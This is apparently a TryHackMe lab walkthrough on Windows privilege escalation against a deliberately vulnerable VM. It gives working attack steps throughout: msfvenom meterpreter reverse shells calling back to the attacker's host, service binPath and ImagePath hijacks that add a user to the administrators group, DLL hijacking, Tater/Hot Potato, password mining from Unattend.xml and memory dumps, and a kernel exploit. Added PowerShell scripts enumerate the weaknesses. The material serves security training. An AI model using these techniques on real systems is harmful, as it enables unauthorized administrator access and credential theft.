
Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321

medium

75 min

25,650



To complete this room and access the vulnerable Windows machine, you need to first connect to TryHackMe's VPN. If you've not done this before, first complete the OpenVPN room and learn how to connect.

Answer the questions below

Connect to TryHackMe's VPN.

This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. This lab was built using Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop) and is used as part of The Cyber Mentor's Windows Privilege Escalation Udemy course (https://udemy.com/course/windows-privilege-escalation-for-beginners).

All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).

Let's first connect to the machine. RDP is open on port 3389. Your credentials are:

username: user
password: password321

For any administrative actions you might take, your credentials are:

username: TCM
password: Hacker123

Answer the questions below

Deploy the machine and log into the user account via RDP

Open a command prompt and run 'net user'. Who is the other non-default user on the machine?

Registry Escalation - Autorun

Detection

Windows

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
2. In Autoruns, click on the 'Logon' tab.
3. From the listed results, notice that the "My Program" entry points to "C:\Program Files\Autorun Program\program.exe".
4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -accepteula -wvu "C:\Program Files\Autorun Program" (the -accepteula switch suppresses the Sysinternals licence dialog on first run)
5. From the output, notice that the "Everyone" group has "FILE_ALL_ACCESS" on the "program.exe" file. Anyone on the machine can therefore replace a binary that runs at every logon, including an administrator's.


Exploitation

Kali

1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address] (use your VPN address on tun0, not eth0, or the target cannot reach you)
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali IP Address] -f exe -o program.exe
7. Copy the generated file, program.exe, to the Windows VM.

Windows

1. Place program.exe in 'C:\Program Files\Autorun Program', overwriting the original.
2. To simulate the privilege escalation effect, log off and then log back on as the administrator user (TCM / Hacker123). HKLM Run entries execute in the context of whoever logs on, so the payload now runs with that user's privileges.

Kali

1. Wait for a new session to open in Metasploit.
2. In (msf > prompt) type: sessions -i [Session ID]
3. To confirm that the attack succeeded, in (msf > prompt) type: getuid

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Registry Escalation - AlwaysInstallElevated

Detection

Windows

1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that the "AlwaysInstallElevated" value is 1.
3. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4. From the output, notice that the "AlwaysInstallElevated" value is 1. Both the HKLM and the HKCU value must be 1 for the Windows Installer to run packages as SYSTEM; one of them alone is not exploitable.
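The same two checks as one PowerShell function, added here as an example rather than taken from the room. It treats a missing key or value as 0 (the reg query above simply errors in that case) and only reports the setting as exploitable when both values are 1:

```powershell
# Added example (not from the room): report whether AlwaysInstallElevated is
# exploitable. Both the HKLM and HKCU values must be 1; a missing key or value
# counts as 0, so the lookups must not throw on absent paths.
function Test-AlwaysInstallElevated {
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $results = foreach ($key in $keys) {
        $value = 0
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($null -ne $item) { $value = [int]$item.AlwaysInstallElevated }
        [pscustomobject]@{ Key = $key; AlwaysInstallElevated = $value }
    }
    $results | Format-Table -AutoSize | Out-String | Write-Host
    # Exploitable only when every key is set to 1
    return (@($results | Where-Object { $_.AlwaysInstallElevated -ne 1 }).Count -eq 0)
}

if (Test-AlwaysInstallElevated) {
    Write-Host 'Both values are 1: an MSI run by this user installs as SYSTEM.'
} else {
    Write-Host 'Not exploitable: at least one value is missing or 0.'
}
```

The msfvenom MSI used in the exploitation steps runs the payload during the install phase and then reports a failed install; that is expected, the payload has already executed as SYSTEM by then.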

Exploitation

Kali

1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.

Windows

1. Place 'setup.msi' in 'C:\Temp'.
2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Enjoy your shell! :)

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Service Escalation - Registry

Detection

Windows

1. Open a PowerShell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output shows "NT AUTHORITY\INTERACTIVE" with "FullControl" over the registry key. Any interactively logged-on user can therefore rewrite the service's ImagePath and choose what runs as the service account.

Exploitation

Windows

1. Copy 'C:\Users\User\Desktop\Tools\Source\windows_service.c' to the Kali VM.

Kali

1. Open windows_service.c in a text editor and replace the command passed to the system() function with: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the terminal: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if the cross-compiler is not installed, run 'sudo apt install gcc-mingw-w64')
3. Copy the generated file, x.exe, to the Windows VM.

Windows

1. Place x.exe in ‘C:\Temp’.
2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
3. In the command prompt type: sc start regsvc
4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
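The Get-Acl check above looks at one service key. Added here as an example (not the room's own code) is a sweep over every service key under HKLM\SYSTEM\CurrentControlSet\Services that reports any key where a low-privileged principal holds a right sufficient to change ImagePath or the DACL. The principal list is an assumption; extend it with the groups shown by whoami /groups on the machine you are assessing.

```powershell
# Added example (not from the room): find services whose registry key grants
# write-type rights to low-privileged principals, the condition the Get-Acl
# check on regsvc exposes. Writing ImagePath under such a key lets the user
# choose what runs as the service account (SYSTEM for regsvc).
$lowPrivPrincipals = @(           # assumption: extend from `whoami /groups`
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    "$env:USERDOMAIN\$env:USERNAME"
)
# Any of these rights lets the caller change ImagePath or rewrite the DACL.
$writeRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership -bor
               [System.Security.AccessControl.RegistryRights]::FullControl

function Find-WritableServiceKey {
    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
            if ($null -eq $acl) { return }          # skip keys we cannot even read
            foreach ($ace in $acl.Access) {
                $grantsWrite = ($ace.AccessControlType -eq 'Allow') -and
                               (($ace.RegistryRights -band $writeRights) -ne 0)
                if ($grantsWrite -and ($lowPrivPrincipals -contains $ace.IdentityReference.Value)) {
                    [pscustomobject]@{
                        Service   = $key.PSChildName
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.RegistryRights
                        ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
                    }
                }
            }
        }
}

Find-WritableServiceKey | Format-Table -AutoSize
```

On the lab machine this should list regsvc with NT AUTHORITY\INTERACTIVE and FullControl. Deny ACEs are ignored for brevity, so treat a hit as a lead to confirm with reg add, as the exploitation steps do, rather than as proof.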

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Service Escalation - Executable Files

Detection

Windows

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -accepteula -wvu "C:\Program Files\File Permissions Service"
2. Notice that the "Everyone" group has "FILE_ALL_ACCESS" on the filepermservice.exe file, so any user can swap the binary the service runs.

Exploitation

Windows

1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe" (this reuses the x.exe compiled from windows_service.c in the previous task)
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Privilege Escalation - Startup Applications

Detection

Windows

1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

Exploitation

Kali

1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.

Windows

1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Login with the administrator account credentials.

Kali

1. Wait for a session to be created, it may take a few seconds.
2. In (meterpreter > prompt) type: getuid
3. From the output, notice the user is "User-PC\Admin"
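The Autorun, service-binary and Startup-folder tasks are three instances of one weakness: a privileged principal executes a file from a location the low-privileged user can modify. The PowerShell below is an added example (not the room's own code) that enumerates all three sources and tests each target against the current token's own SIDs, so group memberships such as Everyone or BUILTIN\Users are taken into account without a hand-maintained list. It assumes PowerShell 3.0 or later.

```powershell
# Added example (not from the room): list executables that a privileged logon or
# service will run from a location the current user can modify. Sources: Run-key
# autoruns, the all-users Startup folder, and service binaries. "Writable" is
# judged against the SIDs in the current token. Deny ACEs are ignored (approximation).
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$tokenSids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Test-WritableByMe([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $acl) { return $false }
    # Resolve identities to SIDs so they compare directly with the token
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -eq 'Allow' -and
            (($ace.FileSystemRights -band $writeMask) -ne 0) -and
            ($tokenSids -contains $ace.IdentityReference.Value)) {
            return $true
        }
    }
    return $false
}

# Strip quotes and arguments from a command line to get the executable path.
function Get-ExecutablePath([string]$CommandLine) {
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 1) { return $cl.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($cl, '^(.+?\.exe)', 'IgnoreCase')   # unquoted: first .exe
    if ($m.Success) { return $m.Groups[1].Value }
    return $cl.Split(' ')[0]
}

$candidates = @()
foreach ($runKey in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run') {
    $props = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
    if ($props) {
        foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }) {
            $candidates += [pscustomobject]@{ Source = "Run: $($p.Name)"; Command = $p.Value }
        }
    }
}
$startup = [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
$candidates += [pscustomobject]@{ Source = 'Startup folder'; Command = "`"$startup`"" }
foreach ($svc in Get-WmiObject -Class Win32_Service) {
    $candidates += [pscustomobject]@{ Source = "Service: $($svc.Name)"; Command = $svc.PathName }
}

# Report the file itself and, for files, the directory it lives in: a writable
# directory lets you replace a file you cannot open for writing.
foreach ($c in $candidates) {
    $exe = Get-ExecutablePath $c.Command
    if (-not $exe) { continue }
    $targets = @($exe)
    if (Test-Path -LiteralPath $exe -PathType Leaf) { $targets += Split-Path -Parent $exe }
    foreach ($t in $targets) {
        if (Test-WritableByMe $t) {
            [pscustomobject]@{ Source = $c.Source; Writable = $t }
        }
    }
}
```

Expect the "My Program" autorun, filepermservice and the common Startup folder among the results on this lab. Get-WmiObject is used rather than Get-CimInstance because the target is Windows 7.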

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Service Escalation - DLL Hijacking

Detection

Windows

1. Open the Tools folder that is located on the desktop and then go to the Process Monitor folder.
2. In reality, the executable would be copied from the victim's host to the attacker's host for run-time analysis, or the same software would be installed on the attacker's host if it can be obtained. To simulate this, right-click on Procmon.exe and select 'Run as administrator' from the menu.
3. In Procmon, select "Filter". From the left-most drop-down menu, select 'Process Name'.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads "Process Name is dllhijackservice.exe then Include" and click on the 'Add' button, then 'Apply' and lastly 'OK'.
6. Next, select 'Result' from the left-most drop-down menu.
7. In the input box on the same line type: NAME NOT FOUND
8. Make sure the line reads "Result is NAME NOT FOUND then Include" and click on the 'Add' button, then 'Apply' and lastly 'OK'.
9. Open command prompt and type: sc start dllsvc
10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to load 'C:\Temp\hijackme.dll' but could not, as the file was not found. Note that 'C:\Temp' is a writable location, and that the loader takes the first matching file in its search order, so a DLL placed there is loaded by the service.

Exploitation

Windows

1. Copy 'C:\Users\User\Desktop\Tools\Source\windows_dll.c' to the Kali VM.

Kali

1. Open windows_dll.c in a text editor and replace the command passed to the system() function with: cmd.exe /k net localgroup administrators user /add
2. Exit the text editor and compile the file by typing the following in the terminal: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. Copy the generated file, hijackme.dll, to the Windows VM.

Windows

1. Place hijackme.dll in 'C:\Temp'.
2. Open command prompt and type: sc stop dllsvc & sc start dllsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
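Reading the Procmon window by hand does not scale past one service. Added here as an example (not from the room) is a PowerShell triage of a Procmon CSV export (File > Save, CSV format) that keeps only NAME NOT FOUND DLL loads for the chosen process and checks whether the directory in each miss is writable by probing it, then does the same for every directory on PATH, which is the last stop in the DLL search order. The CSV rows are constructed to resemble the dllsvc output and are not the lab's real capture.

```powershell
# Added example (not from the room): triage a Procmon CSV export for DLL
# hijacking candidates. A DLL that is NAME NOT FOUND in a directory the user can
# write to is a hijack point, because the loader takes the first match in search
# order. The sample rows below are constructed, not the lab's real output.
$sampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:01:02.1","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.2","dllhijackservice.exe","1234","CreateFile","C:\Windows\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.3","dllhijackservice.exe","1234","CreateFile","C:\Temp\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:01:02.4","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
'@

function Test-DirectoryWritable([string]$Dir) {
    # Probe by creating and deleting a file; this reflects the effective token,
    # including group memberships, without interpreting the DACL.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Find-DllHijackCandidate([string]$Csv, [string]$ProcessName) {
    $rows = ConvertFrom-Csv -InputObject $Csv
    $rows |
        Where-Object { $_.'Process Name' -eq $ProcessName -and
                       $_.Result -eq 'NAME NOT FOUND' -and
                       $_.Path -like '*.dll' } |
        ForEach-Object {
            $dir = Split-Path -Parent $_.Path
            [pscustomobject]@{
                Dll      = Split-Path -Leaf $_.Path
                Dir      = $dir
                Writable = Test-DirectoryWritable $dir
            }
        }
}

Find-DllHijackCandidate -Csv $sampleCsv -ProcessName 'dllhijackservice.exe' | Format-Table -AutoSize

# Directories on PATH are searched last; any writable one hijacks every DLL
# that is missing from the application directory and the system directories.
$env:Path -split ';' | Where-Object { $_ } | ForEach-Object {
    [pscustomobject]@{ PathDir = $_; Writable = Test-DirectoryWritable $_ }
} | Format-Table -AutoSize
```

To run it on a real capture, replace $sampleCsv with Get-Content -Raw on the exported file. Only misses for the DLL name matter; a later SUCCESS row for the same name at a different path means the loader found it there, and the writable directory must come earlier in the search order to win.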

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Service Escalation - binPath

Detection

Windows

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -accepteula -wuvc daclsvc
2. Notice that the output shows the user "User-PC\User" holds the "SERVICE_CHANGE_CONFIG" permission, which allows the service's binary path to be rewritten.

Exploitation

Windows

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add" (the space after "binpath=" is required by sc; record the original BINARY_PATH_NAME from 'sc qc daclsvc' first if you need to restore it)
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators. The start request itself reports an error, because net.exe does not report back to the service control manager like a real service binary and the start times out; the command has already executed as the service account by then.
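accesschk decodes the service DACL for you; the same answer can be derived from the SDDL that 'sc sdshow' prints, which is useful where Sysinternals tools cannot be dropped on the host. The PowerShell below is an added example (not from the room) that parses the SDDL with the .NET RawSecurityDescriptor class and flags the rights that matter for this attack. The access-mask constants are the Windows SDK values.

```powershell
# Added example (not from the room): parse the SDDL that `sc sdshow` returns for
# a service and report which principals hold SERVICE_CHANGE_CONFIG, WRITE_DAC or
# WRITE_OWNER, the rights accesschk flags for daclsvc. Access-mask bit values
# come from the Windows SDK (winsvc.h / winnt.h).
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_STOP          = 0x0020
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000

function Get-ServiceDaclRisk([string]$ServiceName) {
    # sc.exe, not the PowerShell alias sc (Set-Content); the SDDL line starts with D:
    $sddl = (& sc.exe sdshow $ServiceName | Where-Object { $_ -match '^[DO]:' }) -join ''
    if (-not $sddl) { throw "sc sdshow returned no SDDL for $ServiceName" }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $mask  = $ace.AccessMask
        $flags = @()
        if ($mask -band ($SERVICE_CHANGE_CONFIG -bor $GENERIC_ALL -bor $GENERIC_WRITE)) { $flags += 'SERVICE_CHANGE_CONFIG' }
        if ($mask -band ($WRITE_DAC -bor $GENERIC_ALL))     { $flags += 'WRITE_DAC' }
        if ($mask -band ($WRITE_OWNER -bor $GENERIC_ALL))   { $flags += 'WRITE_OWNER' }
        if ($mask -band ($SERVICE_START -bor $GENERIC_ALL)) { $flags += 'SERVICE_START' }
        if ($mask -band ($SERVICE_STOP -bor $GENERIC_ALL))  { $flags += 'SERVICE_STOP' }
        if ($flags.Count -eq 0) { continue }
        # Translate the SID to a name where possible; keep the SID otherwise
        $who = $ace.SecurityIdentifier.Value
        try { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{
            Service   = $ServiceName
            Principal = $who
            Mask      = ('0x{0:X8}' -f $mask)
            Rights    = ($flags -join ',')
        }
    }
}

Get-ServiceDaclRisk -ServiceName 'daclsvc' | Format-Table -AutoSize
```

SERVICE_CHANGE_CONFIG alone is enough for the sc config attack; WRITE_DAC or WRITE_OWNER let you grant it to yourself first. SERVICE_START and SERVICE_STOP are listed because without them you still need a reboot or another trigger to run the new binary path.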

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Service Escalation - Unquoted Service Paths

Detection

Windows

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the "BINARY_PATH_NAME" field displays a path that contains spaces and is not enclosed in quotes. The service control manager therefore tries each space-delimited prefix as an executable name before the real one.

Exploitation

Kali

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe (the exe-service format produces a binary that behaves as a service, so the start does not time out)
2. Copy the generated file, common.exe, to the Windows VM.

Windows

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
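The candidate file names the service control manager tries can be derived mechanically from the unquoted path. The PowerShell below is an added example (not from the room) that generates them in order for any path, then sweeps every service on the host and probes whether each candidate's directory is writable. The sample unquotedsvc path is an assumption consistent with where the walkthrough drops common.exe; substitute the BINARY_PATH_NAME that 'sc qc unquotedsvc' actually shows.

```powershell
# Added example (not from the room): enumerate services whose binary path is
# unquoted and contains spaces, and list every intermediate path the service
# control manager tries before the real one, in order.
function Get-UnquotedPathCandidate([string]$PathName) {
    # Quoted paths, and paths whose executable portion has no spaces, are safe
    if ($PathName -match '^\s*"') { return @() }
    $exe = ([regex]::Match($PathName, '^(.+?\.exe)', 'IgnoreCase')).Groups[1].Value
    if (-not $exe -or $exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $candidates = @()
    # "C:\Program Files\Unquoted Path Service\Common Files\x.exe" is tried as
    # C:\Program.exe, then "C:\Program Files\Unquoted.exe", and so on.
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        $candidates += [pscustomobject]@{
            Candidate = "$prefix.exe"
            Directory = Split-Path -Parent $prefix
        }
    }
    return $candidates
}

# Constructed input matching the lab's layout (assumption, see lead-in)
$example = 'C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe'
Get-UnquotedPathCandidate $example | Format-Table -AutoSize

# Live sweep: every service with an unquoted, space-containing path, the account
# it runs as, and whether this user can drop a file where each candidate lives.
Get-WmiObject -Class Win32_Service |
    Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
    ForEach-Object {
        $svc = $_
        foreach ($c in Get-UnquotedPathCandidate $svc.PathName) {
            $writable = $false
            if (Test-Path -LiteralPath $c.Directory -PathType Container) {
                $probe = Join-Path $c.Directory ([System.IO.Path]::GetRandomFileName())
                try {
                    [System.IO.File]::WriteAllText($probe, '')
                    Remove-Item -LiteralPath $probe -Force
                    $writable = $true
                } catch { }
            }
            [pscustomobject]@{
                Service   = $svc.Name
                StartName = $svc.StartName
                Candidate = $c.Candidate
                Writable  = $writable
            }
        }
    } | Format-Table -AutoSize
```

For the example path the third candidate, "C:\Program Files\Unquoted Path Service\Common.exe", is the one the walkthrough plants. A candidate is only useful when its directory is writable and the service runs as a more privileged account than you (StartName), and when you can start the service or wait for a reboot.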

For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain (https://tryhackme.com/room/steelmountain).

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Potato Escalation - Hot Potato

Exploitation

Windows

1. In command prompt type: powershell.exe -nop -ep bypass
2. In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators

Answer the questions below

Click 'Completed' once you have successfully elevated the machine

Password Mining Escalation - Configuration Files

Exploitation

Windows

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the "<Password>" element and copy the base64 string between the "<Value>" tags underneath it.

Kali

1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password

Answer the questions below

What is the cleartext password found in Unattend.xml?

Password Mining Escalation - Memory

Exploitation

Kali

1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In (msf > prompt) type: set uripath x
4. In (msf > prompt) type: run

Windows

1. Open Internet Explorer and browse to: http://[Kali IP Address]/x
2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
4. Copy the generated file, iexplore.DMP, to the Kali VM.

Kali

1. Place 'iexplore.DMP' on the desktop.
2. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3. Copy the Base64-encoded string that follows "Basic".
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials, in user:password form, in the output.
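Both password-mining tasks end in a base64 decode, and the walkthrough's echo | base64 -d works because the lab values are plain. Added here as an example (not from the room) is a PowerShell version of both decodes that also handles the caveat the lab skips: a sysprep-generated Unattend.xml stores a password as base64 of the UTF-16LE text with the literal string "Password" appended when PlainText is false, so a raw decode shows the wrong value. The XML and the dump bytes below are constructed samples, not the lab's real values.

```powershell
# Added example (not from the room): decode passwords from an Unattend.xml and
# from "Authorization: Basic" headers found in a process dump. Sample inputs are
# constructed; the Unattend value encodes "Passw0rd!" the way sysprep does.
$sampleUnattend = @'
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password>
          <Value>UABhAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
'@

function ConvertFrom-UnattendPassword([string]$Base64, [string]$Suffix = 'Password') {
    $bytes = [Convert]::FromBase64String($Base64)
    # UTF-16LE text from sysprep has a zero high byte in every second position
    $looksUtf16 = ($bytes.Length -ge 2) -and ($bytes.Length % 2 -eq 0) -and ($bytes[1] -eq 0)
    if ($looksUtf16) {
        $text = [System.Text.Encoding]::Unicode.GetString($bytes)
        if ($text.EndsWith($Suffix)) { $text = $text.Substring(0, $text.Length - $Suffix.Length) }
        return $text
    }
    return [System.Text.Encoding]::UTF8.GetString($bytes)   # plain base64, as in the lab
}

function Get-UnattendPassword([xml]$Doc) {
    # local-name() sidesteps the default namespace; covers AutoLogon and UserAccounts
    foreach ($node in $Doc.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')) {
        $value = $node.SelectSingleNode('*[local-name()="Value"]')
        $plain = $node.SelectSingleNode('*[local-name()="PlainText"]')
        if ($null -eq $value) { continue }
        if ($plain -and $plain.InnerText -eq 'true') { $pw = $value.InnerText }
        else { $pw = ConvertFrom-UnattendPassword $value.InnerText }
        [pscustomobject]@{ Element = $node.LocalName; Password = $pw }
    }
}

Get-UnattendPassword ([xml]$sampleUnattend)
# Real file: Get-UnattendPassword ([xml](Get-Content -Raw C:\Windows\Panther\Unattend.xml))

# Memory dump: scan the raw bytes for "Authorization: Basic <b64>" and decode user:pass.
function Get-BasicAuthFromDump([byte[]]$Bytes) {
    $text = [System.Text.Encoding]::ASCII.GetString($Bytes)   # non-ASCII bytes become '?'
    foreach ($m in [regex]::Matches($text, 'Authorization: Basic ([A-Za-z0-9+/=]+)')) {
        try {
            $cred = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($m.Groups[1].Value))
            [pscustomobject]@{ Encoded = $m.Groups[1].Value; Credential = $cred }
        } catch { }   # truncated or corrupt base64 in the dump
    }
}

# Constructed dump fragment; a real one comes from Task Manager's "Create Dump File"
$sampleDump = [System.Text.Encoding]::ASCII.GetBytes("GET /x HTTP/1.1`r`nHost: 10.0.0.5`r`nAuthorization: Basic dXNlcjpwYXNzd29yZDMyMQ==`r`n`r`n")
Get-BasicAuthFromDump $sampleDump
# Real file: Get-BasicAuthFromDump ([System.IO.File]::ReadAllBytes('C:\Users\User\Desktop\iexplore.DMP'))
```

The sample XML decodes to Passw0rd! and the sample dump to user:password321. Loading a full browser dump as one string is memory-hungry but fine for a few hundred megabytes; for larger files read it in chunks with an overlap longer than the longest expected header.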

Answer the questions below

Click 'Completed' once you have successfully found all the passwords

Privilege Escalation - Kernel Exploits

Establish a shell

Kali

1. Open command prompt and type: msfconsole
2. In (msf > prompt) type: use multi/handler
3. In (msf > prompt) type: set payload windows/x64/meterpreter/reverse_tcp (the handler payload must match the architecture and type of the payload msfvenom generates in step 6)
4. In (msf > prompt) type: set lhost [Kali IP Address]
5. In (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali IP Address] -f exe -o shell.exe
7. Copy the generated file, shell.exe, to the Windows VM.

Windows

1. Execute shell.exe and obtain reverse shell

Detection & Exploitation

Kali

1. In (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In (msf > prompt) type: set SESSION [SESSION number]
5. In (msf > prompt) type: set LPORT 5555
6. In (msf > prompt) type: run

